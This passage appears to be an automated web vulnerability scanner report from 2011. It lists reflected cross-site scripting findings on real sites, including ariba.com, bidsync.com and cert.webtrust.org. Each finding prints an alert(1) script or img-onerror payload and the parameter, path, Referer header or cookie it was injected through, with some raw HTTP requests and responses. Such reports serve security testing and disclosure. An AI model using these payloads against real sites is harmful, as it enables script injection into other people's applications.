The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a655f--><script>alert(1)</script>0dc3e6f4beb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.44. http://www.ariba.com/contact.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/contact.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dab2"><script>alert(1)</script>14911a9ec02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f8e3"><script>alert(1)</script>92572bbccc0 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 request parameter is copied into an HTML comment. The payload 4483a--><script>alert(1)</script>e950b37fe07 was submitted in the 7e2e6%22%3E%3Cscript%3Ealert(1)%3C/script%3Eee10b37ba61 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.47. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/legal/en_webtrust.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e2e6"><script>alert(1)</script>ee10b37ba61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.48. http://www.ariba.com/legal/en_webtrust.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/legal/en_webtrust.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ac553--><script>alert(1)</script>6aedde591de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.49. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/roles/it.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e864"><script>alert(1)</script>4a0c0970880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.50. http://www.ariba.com/roles/it.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/roles/it.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 99487--><script>alert(1)</script>6b84c1d7b2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.51. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/services/support.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dbac"><script>alert(1)</script>03affe20636 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.52. http://www.ariba.com/services/support.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/services/support.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b09fb--><script>alert(1)</script>335291e69b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99102"><script>alert(1)</script>03e1c43be50 was submitted in the x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the x request parameter is copied into an HTML comment. The payload fbf9c--><script>alert(1)</script>18154aa94d5 was submitted in the x parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.55. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/solutions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 227cf"><script>alert(1)</script>374e4619cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.56. http://www.ariba.com/solutions/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/solutions/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bc027--><script>alert(1)</script>70af1c16482 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
1.57. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/suppliermembership/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae70"><script>alert(1)</script>e1491ffb028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.58. http://www.ariba.com/suppliermembership/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ariba.com
Path:
/suppliermembership/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b223b--><script>alert(1)</script>4a90bc7dcd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a was submitted in the REST URL parameter 1. This input was echoed as 2ca57<img src=a onerror=alert(1)>2dcc38cf48a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /2ca57<img%20src%3da%20onerror%3dalert(1)>2dcc38cf48a?ac=register&posting=true&plan=0®type=default&cmd=next HTTP/1.1 Host: www.bidsync.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Set-Cookie: LBCOOKIE=R327324337; path=/ Date: Tue, 18 Oct 2011 17:52:35 GMT Server: Apache X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6) Cache-Control: no-cache Pragma: no-cache Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 6446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>404 Not Found | B ...[SNIP]... <b>/2ca57<img src=a onerror=alert(1)>2dcc38cf48a/index.html</b> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e93ca<img%20src%3da%20onerror%3dalert(1)>e91ec3331d4 was submitted in the REST URL parameter 1. This input was echoed as e93ca<img src=a onerror=alert(1)>e91ec3331d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 Not Found Set-Cookie: LBCOOKIE=R327324337; path=/ Date: Tue, 18 Oct 2011 17:52:37 GMT Server: Apache X-Powered-By: Servlet/3.0 JSP/2.2 (GlassFish Server Open Source Edition 3.1.1 Java/Sun Microsystems Inc./1.6) Cache-Control: no-cache Pragma: no-cache Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 6446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>404 Not Found | B ...[SNIP]... <b>/e93ca<img src=a onerror=alert(1)>e91ec3331d4/index.html</b> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e90de<script>alert(1)</script>0554eaa8499 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ViewSeal?id=781 HTTP/1.1 Host: cert.webtrust.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.google.com/search?hl=en&q=e90de<script>alert(1)</script>0554eaa8499 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 18 Oct 2011 16:36:03 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 258
The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f219e"><script>alert(1)</script>dfa1c716294 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa844"><script>alert(1)</script>d6e08f65673 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3fb"><script>alert(1)</script>290d4d628a6 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64756"><script>alert(1)</script>063af6a43b5 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the CAMPID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 693f8"><script>alert(1)</script>7679c7dae64 was submitted in the CAMPID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.